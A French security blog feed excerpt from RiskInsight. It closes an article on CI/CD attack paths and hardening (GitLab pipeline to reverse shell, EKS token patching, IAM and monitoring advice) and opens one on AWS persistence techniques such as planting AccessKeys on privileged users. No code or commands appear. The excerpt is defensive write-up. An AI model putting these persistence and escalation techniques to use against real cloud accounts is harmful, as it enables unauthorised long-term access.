<p style="text-align: justify;"><span data-contrast="auto">Regardons ensemble deux </span><b><span data-contrast="none">exemples d’attaque </span></b><span data-contrast="auto">observés par nos équipes d’audit :</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6}"> </span></p>
<p style="text-align: justify;"><span data-contrast="auto">Ce premier test d’intrusion en boîte grise a permis la </span><b><span data-contrast="none">compromission totale</span></b> <span data-contrast="auto">d’une organisation Cloud AWS (600+ comptes) en partant de comptes standards de DevOps.</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6}"> </span></p>
<figure id="attachment_27502" aria-describedby="caption-attachment-27502" style="width: 1280px" class="wp-caption alignnone"><img loading="lazy" decoding="async" class="size-full wp-image-27502" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/Diapositive2.png" alt="Fig 2 - Chemin de compromission d’une attaque sur un cluster d’Amazon EKS " width="1280" height="720" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/Diapositive2.png 1280w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/Diapositive2-340x191.png 340w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/Diapositive2-69x39.png 69w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/Diapositive2-768x432.png 768w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/Diapositive2-800x450.png 800w" sizes="auto, (max-width: 1280px) 100vw, 1280px" /><figcaption id="caption-attachment-27502" class="wp-caption-text"><em>                      Fig 2 &#8211; Chemin de compromission d’une attaque sur un cluster d’Amazon EKS<span style="font-size: revert; text-align: center; color: initial;"> </span></em></figcaption></figure>
<p style="text-align: justify;"><span data-contrast="auto">Dans ce scénario d&rsquo;attaque,</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6}"> </span></p>
<ul>
<li><span data-contrast="auto">Un attaquant pousse du code malveillant</span> <span data-contrast="auto">vers un repository </span><b><span data-contrast="none">GitLab</span></b><span data-contrast="auto">, déclenchant une pipeline dans GitLab CI qui déploie ce code dans un pod Kubernetes générique.</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6}"> </span></li>
<li><span data-contrast="auto">Ce code ouvre un </span><b><span data-contrast="none">reverse shell</span></b><span data-contrast="auto">, permettant à l&rsquo;attaquant de se connecter à distance à l&rsquo;environnement </span><span data-contrast="none">Kubernetes.</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6}"> </span></li>
<li><span data-contrast="auto">Depuis ce pod, l’attaquant exploite le fait que le </span><b><span data-contrast="none">compte de service </span></b><span data-contrast="auto">associé au nœud dispose de privilèges trop élevés (capacité de patcher des jetons dans le cluster) et patch le jeton du nœud administrateur par un jeton générique.</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6}"> </span></li>
<li><span data-contrast="auto">Quand un redéploiement est déclenché, le pod malveillant ne peut qu’être déployer sur l&rsquo;ancien nœud administrateur bénéficiant toujours des droits admin.</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6}"> </span></li>
<li><span data-contrast="auto">Cela permet donc à l&rsquo;attaquant d&rsquo;obtenir des </span><b><span data-contrast="none">privilèges élevés</span></b> <span data-contrast="auto">et de </span><b><span data-contrast="none">se latéraliser</span></b> <span data-contrast="auto">dans l&rsquo;infrastructure </span><span data-contrast="none">AWS</span><span data-contrast="auto">, compromettant ainsi le cluster Elastic Kubernetes Service (EKS) et les ressources associées.</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6}"> </span></li>
</ul>
<p style="text-align: justify;"><span data-contrast="auto">Regardons maintenant un deuxième exemple :</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6}"> </span></p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-27504 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/Diapositive3-e1758008947607.png" alt="Fig 3 - Condensé de plusieurs typologies d’attaques observées dans les CI/CD de nos clients " width="670" height="570" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/Diapositive3-e1758008947607.png 670w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/Diapositive3-e1758008947607-225x191.png 225w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/Diapositive3-e1758008947607-46x39.png 46w" sizes="auto, (max-width: 670px) 100vw, 670px" /></p>
<p style="text-align: center;"><i><span data-contrast="auto">Fig 3 &#8211; Condensé de plusieurs typologies d’attaques observées dans les CI/CD de nos clients</span></i><span data-ccp-props="{&quot;335551550&quot;:2,&quot;335551620&quot;:2}"> </span></p>
<p style="text-align: justify;"><span data-contrast="auto">Ce condensé, présenté à la </span><a href="https://www.riskinsight-wavestone.com/2022/10/lete-cybersecurite-de-wavestone/"><span data-contrast="none">DefCon &amp; BSides 2022</span></a><span data-contrast="auto">, met en évidence comment différents composants d’une chaîne peuvent être utilisés dans une attaque. Retrouvez cette présentation détaillée sur les nouveaux vecteurs d’attaque liés aux CI/CD en </span><a href="https://www.youtube.com/watch?v=a3SeASgtINY"><span data-contrast="none">vidéo </span></a><span data-contrast="auto">!</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559731&quot;:708}"> </span></p>
<p> </p>
<h1 style="text-align: justify;"><b><span data-contrast="auto">Quelles recommandations pour sécuriser sa chaîne CI/CD ?</span></b><span data-ccp-props="{}"> </span></h1>
<p> </p>
<p style="text-align: justify;"><span data-contrast="auto">La chaîne CI/CD est désormais devenue un composant systémique des systèmes d’information pouvant être utilisée afin de compromettre des ressources critiques d’une entreprise.</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559731&quot;:708}"> </span></p>
<p style="text-align: justify;"><span data-contrast="auto">Nos recommandations en matière de sécurité de la chaîne CI/CD peuvent être articulées autour de trois grands axes : la </span><b><span data-contrast="none">gestion des identités et des accès </span></b><span data-contrast="auto">(IAM), une meilleure</span> <b><span data-contrast="none">conception de la chaîne CI/CD</span></b><span data-contrast="auto">, ainsi que sa </span><b><span data-contrast="none">surveillance</span></b><span data-contrast="auto">. Ces recommandations suivent notamment le </span><a href="https://cyber.gouv.fr/publications/devsecops"><span data-contrast="none">guide</span></a><span data-contrast="auto"> DevSecOps de l’ANSSI.</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559731&quot;:708}"> </span></p>
<p style="text-align: justify;"><img loading="lazy" decoding="async" class="aligncenter wp-image-27506 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/Diapositive4-e1758009062200.png" alt="Fig 4 - Trois grands axes de recommandations pour sécuriser une CI/CD " width="1028" height="452" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/Diapositive4-e1758009062200.png 1028w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/Diapositive4-e1758009062200-434x191.png 434w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/Diapositive4-e1758009062200-71x31.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/Diapositive4-e1758009062200-768x338.png 768w" sizes="auto, (max-width: 1028px) 100vw, 1028px" /></p>
<p style="text-align: center;"><i><span data-contrast="auto">Fig 4 &#8211; Trois grands axes de recommandations pour sécuriser une CI/CD</span></i><span data-ccp-props="{&quot;335551550&quot;:2,&quot;335551620&quot;:2}"> </span></p>
<h1> </h1>
<h1 style="text-align: justify;"><b><span data-contrast="auto">Gestion des identités et accès (IAM)</span></b><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6}"> </span></h1>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-27508 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/Diapositive5-e1758009180837.png" alt="Fig 5 – Recommandations IAM" width="970" height="358" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/Diapositive5-e1758009180837.png 970w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/Diapositive5-e1758009180837-437x161.png 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/Diapositive5-e1758009180837-71x26.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/Diapositive5-e1758009180837-768x283.png 768w" sizes="auto, (max-width: 970px) 100vw, 970px" /></p>
<p style="text-align: center;"><i><span data-contrast="auto">Fig 5 – Recommandations IAM</span></i></p>
<h2> </h2>
<h2 style="text-align: justify;"><b><span data-contrast="auto">Gestion des identités</span></b><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6}"> </span></h2>
<p style="text-align: justify;"><span data-contrast="auto">Outre les règles traditionnelles de gestion du cycle de vie des identités, il est recommandé d’utiliser systématiquement du </span><b><span data-contrast="none">Single-Sign On</span></b> <span data-contrast="auto">(SSO) avec authentification </span><b><span data-contrast="none">multifacteur</span></b><span data-contrast="auto"> (MFA) afin de réduire significativement le risque d’intrusion en CI/CD. Cela assurerait par exemple que les utilisateurs qui accèdent aux dépôts de code, qui signent un commit ou effectuent tout autre action privilégiée soient légitimés.</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559731&quot;:708}"> </span></p>
<p> </p>
<h2 style="text-align: justify;"><b><span data-contrast="auto">Contrôle des accès</span></b><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6}"> </span></h2>
<p style="text-align: justify;"><span data-contrast="auto">Il est nécessaire de limiter au maximum les droits des utilisateurs et des comptes de service selon leur fonction dans la chaîne CI/CD, toujours en suivant le </span><b><span data-contrast="none">principe du moindre privilège</span></b><span data-contrast="auto">. Les comptes sans mot de passe gérés par jetons d’accès doivent également être soumis à une gouvernance claire, avec des règles de cycle de vie, de rotation et de recertification régulière pour réduire les risques liés à leur utilisation.</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559731&quot;:708}"> </span></p>
<p style="text-align: justify;"><span data-contrast="auto">Cela peut aussi se faire en passant par du </span><b><span data-contrast="none">contrôle d&rsquo;accès basé sur les rôles</span></b> <span data-contrast="auto">(RBAC). Par exemple, il ne serait pas utile de manière générale de donner un accès en écriture sur la configuration de la chaîne en elle-même à un développeur travaillant sur un projet spécifique.</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559731&quot;:708}"> </span></p>
<p style="text-align: justify;"><span data-contrast="auto">De la même façon, il est pertinent de </span><b><span data-contrast="none">segmenter</span></b> <span data-contrast="auto">ses projets en utilisant différents dépôts de code et de s&rsquo;assurer que le compte orchestrateur d&rsquo;un projet n&rsquo;ait pas des droits excessifs sur le déploiement des projets auxquels il n&rsquo;est pas rattaché.</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559731&quot;:708}"> </span></p>
<p> </p>
<h2 style="text-align: justify;"><b><span data-contrast="auto">Gestion des secrets</span></b><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6}"> </span></h2>
<p style="text-align: justify;"><span data-contrast="auto">Les </span><b><span data-contrast="none">secrets</span></b><span data-contrast="auto"> en CI/CD désignent des données sensibles telles que des mots de passe, des clés d’API, des certificats ou des jetons d’accès. Ces secrets permettent notamment d’effectuer des actions privilégiées dans les pipelines et doivent être récupérés de façon automatique.</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559731&quot;:708}"> </span></p>
<p style="text-align: justify;"><span data-contrast="auto">Des éditeurs comme </span><a href="https://www.hashicorp.com/products/vault"><span data-contrast="none">HashiCorp</span></a><span data-contrast="auto"> proposent des solutions de </span><b><span data-contrast="none">gestionnaires de secrets</span></b> <span data-contrast="auto">pour stocker facilement ses données sensibles et les chiffrer en transit et au repos. </span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559731&quot;:708}"> </span></p>
<p> </p>
<h1 style="text-align: justify;"><b><span data-contrast="auto">Conception de la CI/CD</span></b><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6}"> </span></h1>
<p style="text-align: center;"><span data-ccp-props="{&quot;335551550&quot;:2,&quot;335551620&quot;:2}" data-wp-editing="1"> <img loading="lazy" decoding="async" class="wp-image-27510 size-full aligncenter" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/Diapositive6-e1758009516245.png" alt="Fig 6 – Recommandations sur la conception d’une CI/CD " width="977" height="397" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/Diapositive6-e1758009516245.png 977w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/Diapositive6-e1758009516245-437x178.png 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/Diapositive6-e1758009516245-71x29.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/Diapositive6-e1758009516245-768x312.png 768w" sizes="auto, (max-width: 977px) 100vw, 977px" /></span><i><span data-contrast="auto">Fig 6 – Recommandations sur la conception d’une CI/CD</span></i><span data-ccp-props="{&quot;335551550&quot;:2,&quot;335551620&quot;:2}"> </span></p>
<h2 style="text-align: justify;"><b><span data-contrast="auto">Segmentation des environnements</span></b><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6}"> </span></h2>
<p style="text-align: justify;"><span data-contrast="auto">Il est nécessaire de préserver le </span><b><span data-contrast="none">cloisonnement</span></b><span data-contrast="auto"> entre les utilisateurs, les applications et l’infrastructure pour minimiser les impacts en cas de compromission. Reprenant des conseils de l’ANSSI, il faut considérer les actions réalisées par la chaîne CI/CD de production comme des actions d’administration et réduire au maximum le nombre d’utilisateurs pouvant y accéder. De plus, il est nécessaire d’utiliser du </span><b><span data-contrast="none">chiffrement bout à bout </span></b><span data-contrast="none">et de s’assurer qu’aucun environnement n’est</span> <b><span data-contrast="none">exposé sur internet.</span></b><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559731&quot;:708}"> </span></p>
<p> </p>
<h2 style="text-align: justify;"><b><span data-contrast="auto">Intégration d’outils tiers</span></b><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6}"> </span></h2>
<p style="text-align: justify;"><span data-contrast="auto">De la même manière que l’attaque SolarWinds, un grand nombre d’attaques de type </span><b><span data-contrast="none">supply-chain</span></b> <span data-contrast="auto">sont à l’origine un composant tiers compromis dans une chaîne CI/CD. Ces outils tiers sont souvent indispensables au bon fonctionnement des chaînes d’approvisionnement, ils peuvent aller d’un simple add-on sur un espace de développement, jusqu’à un outil de contrôle de version ou un orchestrateur.</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559731&quot;:708}"> </span></p>
<p style="text-align: justify;"><span data-contrast="auto">Généralement, ces outils se voient accorder des droits leur permettant d’accéder à des ressources sensibles ou d’effectuer des actions spécifiques au sein de la chaîne CI/CD. Si une vulnérabilité sur un outil n’est pas patchée et est exploitée par un attaquant, la capacité d’intervention sera limitée car la résolution de la faille dépendra souvent du fournisseur de l’outil. Il convient donc d’adopter une </span><b><span data-contrast="none">gouvernance stricte</span></b><span data-contrast="auto"> et un processus de </span><b><span data-contrast="none">Third-Party Cyber Risk Management (TPCRM)</span></b> <span data-contrast="auto">pour ces outils tiers.</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559731&quot;:708}"> </span></p>
<p> </p>
<h2 style="text-align: justify;"><b><span data-contrast="auto">Gestion des artefacts</span></b><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6}"> </span></h2>
<p style="text-align: justify;"><span data-contrast="auto">Pour éviter de stocker des </span><b><span data-contrast="none">artefacts malveillants</span></b><span data-contrast="auto">, il est recommandé de les signer en amont de la chaîne pour assurer leur </span><b><span data-contrast="none">intégrité</span></b> <span data-contrast="auto">en vérifiant cette signature au moment de leur déploiement. De la même façon, il faut s’assurer de ne pas déployer des librairies malveillantes en réalisant des scans </span><b><span data-contrast="none">Software Composition Analysis</span></b> <span data-contrast="auto">(SCA) régulièrement. </span></p>
<p style="text-align: justify;"><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559731&quot;:708}"> </span></p>
<h1 style="text-align: justify;"><b><span data-contrast="auto">Surveillance de la chaîne </span></b><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6}"> </span></h1>
<p style="text-align: justify;"><img loading="lazy" decoding="async" class="aligncenter wp-image-27512 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/Diapositive7-e1758009660158.png" alt="Fig 7 – Recommandations de surveillance " width="638" height="352" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/Diapositive7-e1758009660158.png 638w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/Diapositive7-e1758009660158-346x191.png 346w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/Diapositive7-e1758009660158-71x39.png 71w" sizes="auto, (max-width: 638px) 100vw, 638px" /></p>
<p style="text-align: center;"><i><span data-contrast="auto">Fig 7 – Recommandations de surveillance</span></i><span data-ccp-props="{&quot;335551550&quot;:2,&quot;335551620&quot;:2}"> </span></p>
<h2 style="text-align: justify;"><b><span data-contrast="auto">Journalisation et détection</span></b><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6}"> </span></h2>
<p style="text-align: justify;"><span data-contrast="auto">Garder un haut niveau de visibilité et de contrôle sur tous les composants de la chaîne permet d’assurer une maintenance plus facile et une réponse plus rapide en cas d’attaque. </span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559731&quot;:708}"> </span></p>
<p style="text-align: justify;"><span data-contrast="auto">Premièrement, il faut mettre en place une stratégie de </span><b><span data-contrast="none">journalisation</span></b><span data-contrast="auto"> adaptée, en maintenant des logs contenant uniquement ce qui est utile à la traçabilité et la responsabilité en cas d’incident. Il faut aussi s’assurer de stocker ces logs de façon sécurisée, ne pas y laisser des secrets en dur, ainsi que les partager efficacement à son Security information and Event management (SIEM)</span><span data-contrast="none">.</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559731&quot;:708}"> </span></p>
<p style="text-align: justify;"><span data-contrast="auto">Aussi, pour réévaluer sa posture de sécurité et limiter au maximum les possibles chemins de compromission du pipeline CI/CD, des </span><b><span data-contrast="none">audits</span></b> <span data-contrast="auto">et des </span><b><span data-contrast="none">tests d’intrusion</span></b> <span data-contrast="auto">réguliers sont nécessaires. </span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559731&quot;:708}"> </span></p>
<p> </p>
<h2 style="text-align: justify;"><b><span data-contrast="auto">Réponse à incident</span></b><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6}"> </span></h2>
<p style="text-align: justify;"><span data-contrast="auto">Enfin, il faut s’assurer d’inclure sa chaine CI/CD dans ses plans de réponses à incident au même titre que n’importe quel autre périmètre de son système d’information. Il convient par exemple d’avoir des sauvegardes de son code source et ses configurations ainsi que des plans de continuité d’activités en cas de panne d’un outil.</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559731&quot;:708}"> </span></p>
<h1> </h1>
<h1 style="text-align: justify;"><b><span data-contrast="auto">En conclusion</span></b><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6}"> </span></h1>
<p> </p>
<p style="text-align: justify;"><span data-contrast="auto">Les chaînes CI/CD sont devenues une véritable </span><b><span data-contrast="none">pierre angulaire</span></b> <span data-contrast="auto">dans les systèmes d’information. Ces composants systémiques sont aujourd’hui indispensables pour développer et déployer des applications. Pourtant, leur criticité dans les SI appelle à mettre en place des mesures de sécurité adaptées pour qu’elles ne deviennent pas un vecteur d’attaques. </span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559731&quot;:708}"> </span></p>
<p><span data-ccp-props="{&quot;335551550&quot;:2,&quot;335551620&quot;:2}"> <img loading="lazy" decoding="async" class="size-full wp-image-27514 aligncenter" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/Diapositive8-e1758009992895.png" alt="Fig 8 – Quelques composants systémiques et critiques en CI/CD " width="1280" height="340" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/Diapositive8-e1758009992895.png 1280w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/Diapositive8-e1758009992895-437x116.png 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/Diapositive8-e1758009992895-71x19.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/Diapositive8-e1758009992895-768x204.png 768w" sizes="auto, (max-width: 1280px) 100vw, 1280px" /></span></p>
<p style="text-align: center;"><i><span data-contrast="auto">Fig 8 – Quelques composants systémiques et critiques en CI/CD</span></i><span data-ccp-props="{&quot;335551550&quot;:2,&quot;335551620&quot;:2}"> </span></p>
<p style="text-align: justify;"><span data-contrast="auto">Outre les recommandations de cet article, d’autres mesures préventives peuvent se traduire plus précisément par des </span><b><span data-contrast="none">guides de durcissement</span></b> <span data-contrast="auto">pour des outils particuliers d’une chaîne. L’adoption d’une stratégie pertinente de </span><b><span data-contrast="none">formation</span></b> <span data-contrast="auto">des utilisateurs ainsi que de </span><b><span data-contrast="none">conduite du changement </span></b><span data-contrast="auto">est aussi nécessaire pour réussir ces transformations. </span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559731&quot;:708}"> </span></p>
<p> </p>
<p style="text-align: center;"><em>Un grand merci à Jeanne GRENIER pour sa précieuse contribution à la rédaction de cet article.</em></p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2025/09/ci-cd-la-nouvelle-pierre-angulaire-du-si/">CI/CD : la nouvelle pierre angulaire du SI ? </a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://www.riskinsight-wavestone.com/2025/09/ci-cd-la-nouvelle-pierre-angulaire-du-si/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>AWSDoor : Persistance sur AWS</title>
		<link>https://www.riskinsight-wavestone.com/2025/09/awsdoor-persistance-sur-aws/</link>
					<comments>https://www.riskinsight-wavestone.com/2025/09/awsdoor-persistance-sur-aws/#respond</comments>
		
		<dc:creator><![CDATA[Yoann DEQUEKER]]></dc:creator>
		<pubDate>Thu, 11 Sep 2025 15:28:20 +0000</pubDate>
				<category><![CDATA[Deep-dive]]></category>
		<category><![CDATA[Ethical Hacking & Incident Response]]></category>
		<category><![CDATA[Attaques AWS]]></category>
		<category><![CDATA[AWS]]></category>
		<category><![CDATA[AWS Organisation]]></category>
		<category><![CDATA[AWS Organization]]></category>
		<category><![CDATA[AWSDoor]]></category>
		<category><![CDATA[Bucket S3]]></category>
		<category><![CDATA[Cloud]]></category>
		<category><![CDATA[CloudTrail]]></category>
		<category><![CDATA[CloudWatch]]></category>
		<category><![CDATA[Défense AWS]]></category>
		<category><![CDATA[Outil cybersécurité]]></category>
		<category><![CDATA[Persistance IAM]]></category>
		<category><![CDATA[red team]]></category>
		<guid isPermaLink="false">https://www.riskinsight-wavestone.com/?p=27196</guid>

					<description><![CDATA[<p>Cet article comporte de nombreux termes techniques et noms de service qui n&#8217;ont pas de traduction idéales en Français. Pour une lecture plus fluide, vous pouvez consulter l&#8217;article en anglais en cliquant sur « en » en haut de la page. Au...</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2025/09/awsdoor-persistance-sur-aws/">AWSDoor : Persistance sur AWS</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p><em>Cet article comporte de nombreux termes techniques et noms de service qui n&rsquo;ont pas de traduction idéales en Français. Pour une lecture plus fluide, vous pouvez consulter l&rsquo;article en anglais en cliquant sur « en » en haut de la page.</em></p>



<p style="text-align: justify;">Au cours de la dernière décennie<strong>, les infrastructures cloud telles qu’Amazon Web Services (AWS) ont été de plus en plus utilisées</strong> pour héberger des infrastructures critiques, gérer des données sensibles et garantir une évolutivité globale. La transition vers des architectures hybrides et cloud-native a profondément modifié les méthodes de déploiement, de sécurisation et de surveillance des infrastructures.</p>
<p style="text-align: justify;">Cependant, à mesure que l’adoption du cloud s’accélère, ses fonctionnalités et sa complexité <strong>introduisent de nouveaux défis liés à la sécurisation de ces environnements</strong>. Bien que les fournisseurs de services cloud proposent plusieurs mécanismes de sécurité, tels que le contrôle d’accès discrétionnaire et des systèmes de journalisation, de nombreuses organisations <strong>peinent encore à mettre en œuvre des stratégies de sécurité efficaces</strong>, en raison de la nouveauté de ces environnements. Parmi les erreurs de configuration les plus courantes figurent <strong>les </strong><strong>mauvaises configurations des rôles IAM, les politiques trop permissives</strong>, les identifiants exposés et le manque de visibilité sur les activités cloud-native, qui sont donc autant de failles que les attaquants peuvent exploiter.</p>
<p style="text-align: justify;">Lorsqu’un attaquant obtient un accès initial à un environnement cloud, que ce soit par opportunisme ou par exploitation active, <strong>l’action la plus courante après la compromission initiale</strong> et l’escalade de privilèges consiste à <strong>mettre en place des mécanismes de persistance</strong> <strong>d’accès</strong> dans l’environnement.</p>
<p style="text-align: justify;">Contrairement aux réseaux traditionnels sur site, les environnements cloud offrent une multitude de services et <strong>failles de configuration qui peuvent être exploitées pour maintenir un accès à long terme</strong>, même après le début des actions correctives.</p>
<p style="text-align: justify;">Dans cet article, nous explorerons <strong>le concept de persistance d’accès dans AWS</strong>, en analysant les techniques que les adversaires peuvent utiliser pour dissimuler leur présence au sein d’un environnement cloud.</p>
<p style="text-align: justify;">Tout au long de cette article, <strong>les fonctionnalités d’un outil dédié</strong>, conçu pour simplifier et automatiser <strong>le déploiement de techniques de persistance dans les environnements AWS</strong>, seront présentées.</p>
<p style="text-align: justify;"> </p>
<h2 style="text-align: justify;">Persistance sur AWS</h2>
<h3 style="text-align: justify;">Persistance IAM</h3>
<p style="text-align: justify;">Dans le contexte d’AWS, l’<em>Identity and Access Management </em><strong>(IAM) constitue la pierre angulaire de la sécurité</strong>. Elle régit les actions que chaque entité peut effectuer dans l’environnement en définissant des rôles, des utilisateurs, des groupes et les politiques associées qui déterminent l’accès aux ressources : si une action ne vous a <strong>pas été explicitement autorisée, vous ne pourrez pas l’exécuter</strong>.</p>
<p style="text-align: justify;">Globalement, l’IAM fonctionne en <strong>associant des identités (comme les utilisateurs ou rôles IAM)</strong> à des politiques, qui sont des documents <em>JSON</em> décrivant les privilèges d’un objet IAM sur une ressource.</p>
<p style="text-align: justify;">Ces politiques sont extrêmement granulaires et <strong>prennent en charge des conditions telles que les restrictions d’adresse IP, l’authentification multifacteur (MFA) ou l’accès limité durant certaines plages horaires.</strong> Les configurations IAM ne se limitent pas à des contrôles d’accès : elles font partie intégrante de l’infrastructure elle-même.</p>
<p style="text-align: justify;">L’IAM est devenu <strong>un vecteur puissant de persistance d’accès</strong> et, contrairement à un environnement sur site, un attaquant disposant de privilèges suffisants n’a pas besoin de déposer des binaires ou d’exécuter des logiciels malveillants pour maintenir son accès à l’environnement. Il peut simplement <strong>modifier les politiques IAM</strong>, créer de nouveaux utilisateurs, attribuer des permissions malveillantes à des rôles existants ou compromettre des identités de confiance.</p>
<p style="text-align: justify;">Ce qui <strong>rend la persistance basée sur l’IAM particulièrement dangereuse, c’est sa discrétion et sa durabilité</strong>. En effet, les modifications apportées à IAM <strong>se fondent souvent dans les activités administratives légitimes</strong>, ce qui les rend difficiles à détecter. Si l’environnement n’est pas correctement maintenu ou régulièrement audité, <strong>identifier une politique malveillante revient à chercher une aiguille dans une botte de foin.</strong></p>
<p style="text-align: justify;">Dans cette section, nous <strong>explorerons les techniques courantes et moins connues que les attaquants peuvent utiliser</strong> pour établir une persistance d’accès en modifiant les configurations IAM. Nous analyserons des exemples concrets et mettrons en évidence les indicateurs que les équipes de défense doivent surveiller afin de détecter et de répondre à ces tactiques souvent négligées.</p>
<p style="text-align: justify;"> </p>
<h4 style="text-align: justify;">AccessKey</h4>
<h5 style="text-align: justify;"><span style="text-decoration: underline;">Attaque</span></h5>
<p style="text-align: justify;">La technique de <strong>persistance la plus élémentaire</strong> consiste à <strong>ajouter une AccessKey</strong> à un utilisateur.</p>
<p style="text-align: justify;">Sur <em>AWS</em>, les utilisateurs peuvent se connecter via l’interface en ligne de commande (<em>CLI</em>) en utilisant une <em>AccessKey</em>. La méthode la plus simple pour établir une persistance consiste à déployer une <em>AccessKey</em> sur un utilisateur disposant de privilèges élevés.</p>
<p style="text-align: justify;">Une fois la clé créée pour cet utilisateur, l’attaquant peut <strong>accéder à AWS via l’interface en ligne de commande avec les privilèges de l’utilisateur</strong>.</p>
<p style="text-align: justify;">Cependant, cette technique présente certaines limitations :</p>
<ul style="text-align: justify;">
<li>Un utilisateur ne peut avoir que deux AccessKey enregistrées simultanément.</li>
<li>Certaines SCP (Service Control Policies), des politiques globales appliquées par l’organisation sur un sous-compte, peuvent empêcher l’utilisation des AccessKey ou imposer l’authentification multifacteur (MFA).</li>
</ul>
<p style="text-align: justify;">Concernant la limitation du nombre de clés d’accès enregistrées sur un utilisateur, il est possible de :</p>
<ul style="text-align: justify;">
<li>Lister les AccessKey enregistrées sur un utilisateur</li>
<li>Obtenir la dernière date d’utilisation de l’AccessKey : en général, si un utilisateur possède plus d’une AccessKey, la seconde a été perdue, ou n’est plus utilisée et peut être désactivée et supprimée avec un risque acceptable</li>
<li>Supprimer l’AccessKey inutilisée</li>
